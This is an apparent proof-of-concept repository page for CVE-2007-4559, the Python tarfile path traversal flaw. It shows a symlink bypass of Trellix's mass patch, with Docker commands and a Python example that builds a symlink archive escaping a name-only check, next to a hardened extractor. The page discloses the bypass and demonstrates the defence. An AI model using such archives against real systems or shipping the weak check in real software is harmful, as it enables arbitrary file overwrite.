
CVE-2007-4559 PoC: path traversal in the Python tarfile module

Associated Vulnerability
Title: Path traversal vulnerability in the Python tarfile module (CVE-2007-4559)
Description: Python is an open-source, object-oriented programming language maintained by the Python Software Foundation; it is extensible, supports modules and packages, and runs on many platforms. The (1) extract and (2) extractall functions in Python's tarfile module contain a path traversal vulnerability that allows user-assisted remote attackers to overwrite arbitrary files via a .. (dot dot) sequence in filenames inside a TAR archive. The issue is related to CVE-2001-1267.
Description
Bypass for CVE-2007-4559 Trellix patch
Readme
# trellix-tarslip-patch-bypass

In 2023, Trellix announced [1] that they had patched more than 61,000 open-source projects for [CVE-2007-4559](https://nvd.nist.gov/vuln/detail/CVE-2007-4559), an old path traversal vulnerability. Analyzing their patch, it is easy to see that it can be bypassed with a symlink: a symlink member that points outside the extraction directory, followed by a file member whose path goes through that link, escapes a check that only inspects each member's name as a string.

Symlink path traversal is an old technique; it is also shown in LiveOverflow's video [Critical .zip vulnerabilities? - Zip Slip and ZipperDown](https://www.youtube.com/watch?v=Ry_yb5Oipq0).

[1] [Trellix Advanced Research Center Patches 61,000 Vulnerable Open-Source Projects](https://www.trellix.com/blogs/research/trellix-advanced-research-center-patches-vulnerable-open-source-projects/)

### PoC

```
docker build -t tarslip .   # image built from the repo's Dockerfile
docker run -it tarslip bash
python poc.py               # extracts bypass.tar.gz against the patched extractor
cat evil.txt                # proof that the write escaped the extraction directory
```
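The PoC above needs the repository's Docker image and its `bypass.tar.gz`. The following is an added example, not code from this repository or from Trellix, that builds an equivalent symlink archive in memory and contrasts two containment checks. `lexical_within` is an assumption about the general shape of a name-only fix (normalize the joined path with `os.path.abspath` and test that it stays under the destination); it is written here to show why any check that never consults the filesystem is insufficient. The hardened extractor and the constructed member names `out` and `out/evil.txt` are likewise my own.

```python
import io
import os
import tarfile
import tempfile


def build_symlink_tar() -> bytes:
    """Build, in memory, a constructed archive with two members:
    a symlink 'out' -> '..' and a regular file 'out/evil.txt'.
    Neither name contains '..', so a name-only check passes both."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("out")
        link.type = tarfile.SYMTYPE
        link.linkname = ".."
        tar.addfile(link)

        payload = b"pwned\n"
        evil = tarfile.TarInfo("out/evil.txt")
        evil.size = len(payload)
        tar.addfile(evil, io.BytesIO(payload))
    return buf.getvalue()


def lexical_within(directory: str, name: str) -> bool:
    """Name-only containment check (assumed shape of a naive fix):
    abspath collapses '..' textually but never consults the filesystem."""
    base = os.path.abspath(directory)
    target = os.path.abspath(os.path.join(directory, name))
    return os.path.commonpath([base, target]) == base


# Interpreters with PEP 706 filters would otherwise default to 'data' (3.14+);
# pass fully_trusted where the API exists so the vulnerable path is exercised.
_LEGACY = {"filter": "fully_trusted"} if hasattr(tarfile, "data_filter") else {}


def extract_lexical(data: bytes, dest: str) -> None:
    """Extract after a lexical check on every member name. Vulnerable."""
    with tarfile.open(fileobj=io.BytesIO(data)) as tar:
        for m in tar.getmembers():
            if not lexical_within(dest, m.name):
                raise ValueError(f"blocked: {m.name}")
        tar.extractall(dest, **_LEGACY)


def extract_hardened(data: bytes, dest: str) -> None:
    """Extract one member at a time, resolving symlinks already on disk and
    refusing any link whose target leaves dest."""
    base = os.path.realpath(dest)
    with tarfile.open(fileobj=io.BytesIO(data)) as tar:
        for m in tar.getmembers():
            member_dir = os.path.join(dest, os.path.dirname(m.name))
            # realpath follows symlinks created by earlier members
            if os.path.commonpath([base, os.path.realpath(member_dir)]) != base:
                raise ValueError(f"blocked (parent resolves outside dest): {m.name}")
            if m.issym():
                target = os.path.realpath(os.path.join(member_dir, m.linkname))
            elif m.islnk():
                # hard link names are relative to the archive root, not the member
                target = os.path.realpath(os.path.join(dest, m.linkname))
            else:
                target = None
            if target is not None and os.path.commonpath([base, target]) != base:
                raise ValueError(f"blocked (link escapes dest): {m.name} -> {m.linkname}")
            tar.extract(m, dest, **_LEGACY)


def demo() -> tuple:
    """Return (escaped, blocked): did the lexical check let the file land
    outside dest, and did the hardened extractor refuse the archive."""
    data = build_symlink_tar()
    with tempfile.TemporaryDirectory() as root:
        vuln_dest = os.path.join(root, "dest")
        os.mkdir(vuln_dest)
        extract_lexical(data, vuln_dest)
        # 'out' -> '..', so out/evil.txt lands in root, one level above dest
        escaped = os.path.isfile(os.path.join(root, "evil.txt"))

        safe_dest = os.path.join(root, "dest2")
        os.mkdir(safe_dest)
        try:
            extract_hardened(data, safe_dest)
            blocked = False
        except ValueError:
            blocked = True
        return escaped, blocked


if __name__ == "__main__":
    print(demo())
```

On Python 3.12 and later, and on the 3.8 to 3.11 point releases that backported PEP 706, `tar.extractall(dest, filter="data")` rejects this archive out of the box; prefer that over a hand-rolled check. The example passes `filter="fully_trusted"` only so that the vulnerable path runs deterministically on every interpreter.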
File Snapshot

/data/pocs/4b06d88876c026fa96dde9348f1cb1211233583b
├── bypass.tar.gz (160 B)
├── Dockerfile (51 B)
├── poc.py (1.1K)
└── README.md (803 B)

0 directories, 4 files